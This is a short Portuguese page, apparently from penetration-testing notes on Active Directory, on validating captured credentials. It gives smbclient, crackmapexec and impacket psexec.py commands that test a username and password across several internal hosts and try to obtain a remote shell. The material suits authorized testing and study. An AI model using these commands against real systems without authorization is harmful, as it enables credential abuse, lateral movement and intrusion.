Validando as credenciais

Podemos agora utilizar as credenciais obtidas para tentarmos nos autenticar a alguns serviços.

$ smbclient -L \\<ip> -U <usuário> -W <domínio>

Podemos utilizar o crackmapexec para automatizar a autenticação de um usuário e senha em vários hosts.

$ cat hosts
172.16.1.253
172.16.1.243
172.16.1.245

$ crackmapexec smb <hosts> -d <domínio> -u <usuário> -p '<senha>'

Podemos também utilizar o psexec para tentar ganhar uma shell com o usuário e senha obtidos.

python3 /usr/share/doc/python3-impacket/examples/psexec.py <domínio>/<usuário>:'<senha>'@<ip>

PreviousCapturando hashesNextEnumerando as contas do AD

Last updated